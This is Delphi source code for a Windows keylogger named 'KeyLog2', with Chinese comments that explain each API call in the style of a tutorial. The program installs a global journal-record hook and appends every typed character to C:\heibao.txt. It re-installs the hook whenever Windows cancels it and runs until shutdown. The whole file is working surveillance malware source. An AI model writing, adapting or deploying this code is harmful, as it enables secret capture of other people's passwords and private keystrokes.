program KeyLog2;
uses
Windows,
Messages;
var JournalRecordHook: HHOOK;
// 记录钩子回调函数
function JournalRecordProc(nCode: Integer; wParam: WPARAM; lParam: LPARAM): LRESULT; stdcall;
var
Kbs: TKeyboardState; // 键盘状态类型
HFile: THandle; // 句柄类型
WChar: array[0..1] of Char;
WSize: DWORD;
{API函数
1 ToAscii
1 GetKeyboardState}
begin
// lParam指向消息结构, 并且, 是键盘按下消息
if (nCode = HC_ACTION)and (PEventMsg(lParam).message = WM_KEYDOWN) then
//(PEventMsg(lParam).message = WM_KEYDOWN)转换为一种消息类型 WM_KEYDOWN
//(nCode = HC_ACTION)键盘状态是HC_ACTION 激活
begin
// 取键盘状态
//GetKeyboardState() 取键盘状态并且存入到括号里
GetKeyboardState(Kbs);
//GetKeyboardState存入(KBS)里 取键盘状态
// 转换成字符,组合
if ToAscii(PEventMsg(lParam).paramL, PEventMsg(lparam).paramH, Kbs, WChar, 0) = 1 then
//(PEventMsg(lParam).paramL, PEventMsg(lparam).paramH,固定参数
//WChar 固定参数
begin
// 打开文件
HFile := CreateFile('C:\heibao.txt', GENERIC_WRITE,
FILE_SHARE_READ or FILE_SHARE_WRITE, nil, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
// 添加字符
SetFilePointer(HFile, 0, nil, FILE_END);
WriteFile(HFile, WChar[0] , 1, WSize, nil);
// 回车补#10
if (WChar[0] = #13) then
begin
WChar[0] := #10;
WriteFile(HFile, WChar[0] , 1, WSize, nil);
end;
// 关闭保存
CloseHandle(HFile);
end;
end;
// 传给下一个钩子处理, 并且返回它的返回值
Result := CallNextHookEx(JournalRecordHook, nCode, wParam, lParam);
//Result := CallNextHookEx(hook,后三个固定参数nCode, wParam, lParam);
end;
// ~~~~~ 程序入口 ~~~~~
var
Msg: TMsg;// 消息类型,固定
begin
// 安装钩子
JournalRecordHook := SetWindowsHookEx(WH_JOURNALRECORD, @JournalRecordProc, HInstance, 0);
// 消息循环
while GetMessage(Msg, 0, 0, 0) do
// GetMessage(Msg, 0, 0, 0) 后面的三个零固定参数
if (Msg.message = WM_CANCELJOURNAL) then // 此时需要重新挂钩
//if (Msg.message = WM_CANCELJOURNAL) then 判断钩子是否退出
begin
JournalRecordHook :=
SetWindowsHookEx(WH_JOURNALRECORD, @JournalRecordProc, HInstance, 0);
end;
// 卸载钩子
UnHookWindowsHookEx(JournalRecordHook);
(* 注: 由于这个程序并不像其他普通的Windows程序那样, 建立窗口并且在窗口关闭时调用PostQuitMessage(),
使得GetMessage()随后取到WM_QUIT返回FALSE, 而跳出消息循环, 所以这个程序会一直运行下去直到关机 *)
end.
